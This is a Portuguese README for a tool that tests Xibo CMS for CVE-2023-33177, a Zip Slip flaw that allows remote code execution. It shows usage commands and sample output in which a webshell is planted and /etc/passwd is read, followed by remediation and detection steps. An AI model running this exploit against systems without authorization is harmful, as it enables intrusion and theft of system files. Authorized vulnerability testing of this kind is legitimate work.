
Xibo CMS Testador de Vulnerabilidade CVE-2023-33177
Ferramenta automatizada de teste de segurança para CVE-2023-33177 - Vulnerabilidade de Path Traversal Zip Slip no Xibo CMS que leva à Execução Remota de Código (RCE).
Esta ferramenta é apenas para fins educacionais e de teste autorizado. Use apenas em sistemas que você possui ou tem permissão explícita para testar. Testes não autorizados são ilegais e antiéticos.
As versões 1.8.0-2.3.16 e 3.0.0-3.3.4 do Xibo CMS são vulneráveis a um ataque de path traversal através da funcionalidade de importação de layout. Esta ferramenta testa com segurança se sua instância do Xibo é vulnerável tentando escrever um arquivo de teste inofensivo.
## Clone o repositório
git clone [email protected]:kaxm23/-CVE-2023-33177-.git
cd xibo-cve-2023-33177-tester
## Instale os requisitos
pip install -r requirements.txt## -CVE-2023-33177-
Estrutura Básica do Comando
python test_cve_2023_33177.py <URL> <usuário> <senha>
## Instância de desenvolvimento local
python test_cve_2023_33177.py http://localhost/xibo admin senha123
## Produção remota com HTTPS
python test_cve_2023_33177.py https://xibo.example.com [email protected] SecurePass2024!
## Porta e caminho personalizados
python test_cve_2023_33177.py http://192.168.1.100:8080/xibo admin minhasenha
## Sem barra no final (o script lida com isso)
python test_cve_2023_33177.py https://example.com/xibo admin pass
[*] Testando Xibo CMS em http://localhost/xibo
[*] CVE-2023-33177 - Teste de RCE por Zip Slip
[+] Payload de teste criado: test_vuln_1703123456.zip
[+] Login como admin bem-sucedido
[*] Tentando importar layout malicioso...
[*] Resposta da importação: HTTP 200
[*] Verificando webshell...
[!] VULNERÁVEL! Webshell acessível em: http://localhost/security_test.php
[+] Leitura de /etc/passwd bem-sucedida
[*] Pré-visualização da saída: VULN_TEST_root:x:0:0:root:/root:/bin/bash...
[!] O site ESTÁ VULNERÁVEL ao CVE-2023-33177!
[!] Remediação: Atualize o Xibo CMS para a versão 3.3.5+ ou 2.3.17+
[!] Exclua o arquivo de teste: security_test.php
[*] Testando Xibo CMS em http://localhost/xibo
[*] CVE-2023-33177 - Teste de RCE por Zip Slip
[+] Payload de teste criado: test_vuln_1703123456.zip
[+] Login como admin bem-sucedido
[*] Tentando importar layout malicioso...
[*] Resposta da importação: HTTP 200
[*] Verificando webshell...
[-] Webshell não encontrado (HTTP 404)
[+] O site parece NÃO vulnerável (ou caminho diferente)
## Baixe a versão mais recente
wget https://github.com/xibosignage/xibo-cms/releases/latest
## Siga as instruções de atualização
## https://xibo.org.uk/manual/en/upgrade.html
## Encontre arquivos PHP modificados recentemente na raiz web
find /var/www/html -name "*.php" -mtime -7 -type f
## Verifique arquivos suspeitos
find /var/www/html -name "shell.php" -o -name "cmd.php" -o -name "backdoor.php"
## Revise logs de acesso para importações não autorizadas
grep "layout/import" /var/log/apache2/access.log
Altere todas as senhas de usuários do CMS
Gire chaves de API e tokens
Revise e remova contas de usuário não autorizadas
`
📋 Requisitos
Python 3.6 ou superior
Biblioteca requests (instale via pip)
Credenciais válidas do Xibo CMS (autenticação necessária)
Acesso de rede à instância alvo do Xibo
Faça um fork do repositório
Crie um branch de funcionalidade: git checkout -b feature/funcionalidade-incrível
Faça commit das alterações: git commit -m 'Adiciona funcionalidade incrível'
Envie para o branch: git push origin feature/funcionalidade-incrível
Abra um Pull Request
Requisitos de Contribuição
O código deve seguir os padrões PEP 8
O teste deve permanecer não destrutivo
A documentação deve ser atualizada
Nenhum teste ao vivo contra alvos não autorizados
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.
⚖️ Uso Legal e Ético
Ao usar esta ferramenta, você concorda em:
Testar apenas sistemas que você possui ou tem permissão explícita por escrito para testar
Cumprir todas as leis locais, estaduais e federais
Não usar esta ferramenta para fins maliciosos
Reportar vulnerabilidades de forma responsável aos fornecedores
Aceitar total responsabilidade por suas ações
Entrada NVD do CVE-2023-33177
Avisos de Segurança do Xibo
Detalhes da Vulnerabilidade Zip Slip
Guia de Path Traversal da OWASP
Problemas: Issues no GitHub
Relatórios de Segurança: Divulgue de forma responsável por meio de relatório de vulnerabilidade privado no GitHub
Perguntas: Abra uma discussão no GitHub
Se esta ferramenta ajudou você, considere dar uma estrela no repositório!